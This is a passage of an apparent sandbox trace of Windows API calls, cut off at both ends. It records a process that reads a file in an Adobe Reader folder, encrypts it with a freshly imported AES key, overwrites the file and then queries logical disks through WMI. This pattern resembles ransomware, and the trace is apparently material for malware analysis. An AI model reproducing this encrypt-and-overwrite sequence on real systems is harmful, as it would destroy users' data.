lpOldMode=0x8f6ee28) returned 1 [0147.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0147.303] GetFileType (hFile=0x50c) returned 0x1 [0147.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0147.303] GetFileType (hFile=0x50c) returned 0x1 [0147.304] GetFileSize (in: hFile=0x50c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x42ba [0147.304] ReadFile (in: hFile=0x50c, lpBuffer=0x37ec9e8, nNumberOfBytesToRead=0x42ba, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37ec9e8*, lpNumberOfBytesRead=0x8f6eedc*=0x42ba, lpOverlapped=0x0) returned 1 [0147.323] CloseHandle (hObject=0x50c) returned 1 [0147.324] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdf618) returned 1 [0147.324] CryptGenRandom (in: hProv=0xbdf618, dwLen=0x10, pbBuffer=0x37f0ff8 | out: pbBuffer=0x37f0ff8) returned 1 [0148.301] CryptImportKey (in: hProv=0xbdf618, pbData=0x37ba2c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f050) returned 1 [0148.301] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.301] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.301] CryptDuplicateKey (in: hKey=0xb7f050, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f190) returned 1 [0148.301] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.301] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x37ba3a8*=0x1, dwFlags=0x0) returned 1 [0148.301] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x37ba374, dwFlags=0x0) returned 1 [0148.302] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37ba3b8*, pdwDataLen=0x8f6eea8*=0x42c0, dwBufLen=0x42c0 | out: pbData=0x37ba3b8*, pdwDataLen=0x8f6eea8*=0x42c0) returned 1 [0148.302] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37be69c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x37be69c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0148.303] CryptDestroyKey (hKey=0xb7f050) returned 1 [0148.303] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0148.303] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0148.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0148.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0148.304] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0148.305] GetFileType (hFile=0x428) returned 0x1 [0148.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0148.305] GetFileType (hFile=0x428) returned 0x1 [0148.305] WriteFile (in: hFile=0x428, lpBuffer=0x37bec98*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x37bec98*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0148.306] CloseHandle (hObject=0x428) returned 1 [0148.307] CoTaskMemAlloc (cb=0x20c) returned 0xbe3280 [0148.307] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe3280 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.307] CoTaskMemFree (pv=0xbe3280) [0148.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.307] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0148.307] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0148.307] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0148.307] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.308] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024930) returned 0x0 [0148.308] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024930, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0148.308] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024930, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6025530) returned 0x0 [0148.309] WbemDefPath:IUnknown:Release (This=0x6024930) returned 0x0 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6025530) returned 0x0 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0148.309] WbemDefPath:IUnknown:AddRef (This=0x6025530) returned 0x3 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbdef30) returned 0x0 [0148.309] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdef30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.309] WbemDefPath:IUnknown:Release (This=0xbdef30) returned 0x3 [0148.309] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0148.309] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0148.309] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x2 [0148.309] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x1 [0148.309] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0148.309] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0148.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025530, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6025530) returned 0x0 [0148.310] WbemDefPath:IUnknown:AddRef (This=0x6025530) returned 0x3 [0148.310] WbemDefPath:IUnknown:Release (This=0x6025530) returned 0x2 [0148.310] WbemDefPath:IWbemPath:SetText (This=0x6025530, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025530, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetText (in: This=0x6025530, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025530, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025530, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025530, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025530, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025530, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0148.310] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.310] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0148.310] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0148.310] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0148.310] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.467] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6024980) returned 0x0 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024980, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0148.468] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024980, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x60254c0) returned 0x0 [0148.468] WbemDefPath:IUnknown:Release (This=0x6024980) returned 0x0 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x60254c0) returned 0x0 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0148.468] WbemDefPath:IUnknown:AddRef (This=0x60254c0) returned 0x3 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdeed0) returned 0x0 [0148.468] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeed0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.468] WbemDefPath:IUnknown:Release (This=0xbdeed0) returned 0x3 [0148.468] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0148.468] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0148.468] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x2 [0148.468] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x1 [0148.468] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0148.468] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0148.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x60254c0) returned 0x0 [0148.469] WbemDefPath:IUnknown:AddRef (This=0x60254c0) returned 0x3 [0148.469] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x2 [0148.469] WbemDefPath:IWbemPath:SetText (This=0x60254c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.469] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60254c0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0148.469] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0148.469] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.469] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0148.469] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0148.469] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0148.469] IUnknown:Release (This=0xb51e34) returned 0x1 [0148.470] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x602b5a0) returned 0x0 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x602b5a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0148.470] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b5a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60249b0) returned 0x0 [0148.470] WbemLocator:IUnknown:Release (This=0x602b5a0) returned 0x0 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60249b0) returned 0x0 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0148.470] WbemLocator:IUnknown:AddRef (This=0x60249b0) returned 0x3 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0148.470] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0148.470] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0148.470] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x2 [0148.470] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x1 [0148.470] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0148.470] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0148.470] WbemLocator:IUnknown:QueryInterface (in: This=0x60249b0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60249b0) returned 0x0 [0148.470] WbemLocator:IUnknown:AddRef (This=0x60249b0) returned 0x3 [0148.470] WbemLocator:IUnknown:Release (This=0x60249b0) returned 0x2 [0148.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60254c0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0148.470] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0148.471] WbemDefPath:IWbemPath:GetText (in: This=0x60254c0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.471] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60249c0) returned 0x0 [0148.471] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60249c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6029c14) returned 0x0 [0149.966] WbemLocator:IUnknown:QueryInterface (in: This=0x6029c14, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5af54) returned 0x0 [0149.967] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5af54, 